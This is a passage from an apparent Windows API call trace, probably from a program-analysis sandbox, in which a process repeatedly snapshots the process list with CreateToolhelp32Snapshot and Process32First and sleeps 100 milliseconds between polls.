lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0196.156] Sleep (dwMilliseconds=0x64) [0196.159] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0196.169] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0196.221] Sleep (dwMilliseconds=0x64) [0196.222] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0196.233] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0196.301] Sleep (dwMilliseconds=0x64) [0196.303] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0196.318] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0196.369] Sleep (dwMilliseconds=0x64) [0196.371] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0196.382] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0196.435] Sleep (dwMilliseconds=0x64) [0196.437] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0196.448] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0196.508] Sleep (dwMilliseconds=0x64) [0196.511] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0196.526] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0196.579] Sleep (dwMilliseconds=0x64) [0198.073] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0198.102] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0198.158] Sleep (dwMilliseconds=0x64) [0198.160] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0198.172] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0198.223] Sleep (dwMilliseconds=0x64) [0198.225] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0198.243] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0198.323] Sleep (dwMilliseconds=0x64) [0198.324] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0198.335] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0198.394] Sleep (dwMilliseconds=0x64) [0198.395] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0198.406] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0198.454] Sleep (dwMilliseconds=0x64) [0198.456] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0198.467] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0198.518] Sleep (dwMilliseconds=0x64) [0198.520] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0198.530] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0198.584] Sleep (dwMilliseconds=0x64) [0198.597] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0198.607] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0198.656] Sleep (dwMilliseconds=0x64) [0198.658] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0198.669] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0198.719] Sleep (dwMilliseconds=0x64) [0198.722] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0198.732] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0198.783] Sleep (dwMilliseconds=0x64) [0198.785] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0198.796] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0198.846] Sleep (dwMilliseconds=0x64) [0198.848] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0198.858] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0198.904] Sleep (dwMilliseconds=0x64) [0198.906] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0198.923] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0198.973] Sleep (dwMilliseconds=0x64) [0198.975] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0198.985] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0199.046] Sleep (dwMilliseconds=0x64) [0199.047] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0199.057] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0199.110] Sleep (dwMilliseconds=0x64) [0199.112] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0199.123] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0199.172] Sleep (dwMilliseconds=0x64) [0199.173] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0199.183] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0199.343] Sleep (dwMilliseconds=0x64) [0199.344] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0199.357] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0199.408] Sleep (dwMilliseconds=0x64) [0199.410] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0199.420] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0199.470] Sleep (dwMilliseconds=0x64) [0199.472] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0199.484] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0199.532] Sleep (dwMilliseconds=0x64) [0199.535] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0199.544] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0199.608] Sleep (dwMilliseconds=0x64) [0199.610] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0199.622] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0199.692] Sleep (dwMilliseconds=0x64) [0199.693] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0199.706] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0199.759] Sleep (dwMilliseconds=0x64) [0199.760] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0199.771] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0199.819] Sleep (dwMilliseconds=0x64) [0199.821] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0199.834] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0199.884] Sleep (dwMilliseconds=0x64) [0199.886] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0199.895] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0199.946] Sleep (dwMilliseconds=0x64) [0199.948] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0199.957] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0200.011] Sleep (dwMilliseconds=0x64) [0200.016] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0200.026] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0200.075] Sleep (dwMilliseconds=0x64) [0200.077] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0200.086] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0200.138] Sleep (dwMilliseconds=0x64) [0200.139] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0200.148] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0200.195] Sleep (dwMilliseconds=0x64) [0200.197] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0200.207] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0200.257] Sleep (dwMilliseconds=0x64) [0200.259] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0200.271] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0200.356] Sleep (dwMilliseconds=0x64) [0200.358] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0200.369] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0200.520] Sleep (dwMilliseconds=0x64) [0200.522] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0200.536] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0200.598] Sleep (dwMilliseconds=0x64) [0200.600] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0200.616] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0200.691] Sleep (dwMilliseconds=0x64) [0200.695] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0200.709] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0200.779] Sleep (dwMilliseconds=0x64) [0200.780] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0200.794] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0200.871] Sleep (dwMilliseconds=0x64) [0200.874] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0200.890] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0200.959] Sleep (dwMilliseconds=0x64) [0200.964] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0200.979] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0201.092] Sleep (dwMilliseconds=0x64) [0201.093] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0201.107] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0201.190] Sleep (dwMilliseconds=0x64) [0201.192] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0201.204] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0201.267] Sleep (dwMilliseconds=0x64) [0201.269] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0201.280] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0201.369] Sleep (dwMilliseconds=0x64) [0201.372] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0201.383] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0201.456] Sleep (dwMilliseconds=0x64) [0201.458] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0201.472] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0201.538] Sleep (dwMilliseconds=0x64) [0201.539] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0201.554] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0201.662] Sleep (dwMilliseconds=0x64) [0201.664] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0201.681] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0201.749] Sleep (dwMilliseconds=0x64) [0201.753] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0201.768] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0201.841] Sleep (dwMilliseconds=0x64) [0201.842] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0201.856] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0201.930] Sleep (dwMilliseconds=0x64) [0201.932] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0201.947] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0202.089] Sleep (dwMilliseconds=0x64) [0202.091] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0202.105] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0202.196] Sleep (dwMilliseconds=0x64) [0202.198] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0202.209] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0202.270] Sleep (dwMilliseconds=0x64) [0202.273] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0202.318] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0202.384] Sleep (dwMilliseconds=0x64) [0202.387] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0202.399] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0202.470] Sleep (dwMilliseconds=0x64) [0202.472] CreateToolhelp32Snapshot (dwFlags=0x2, 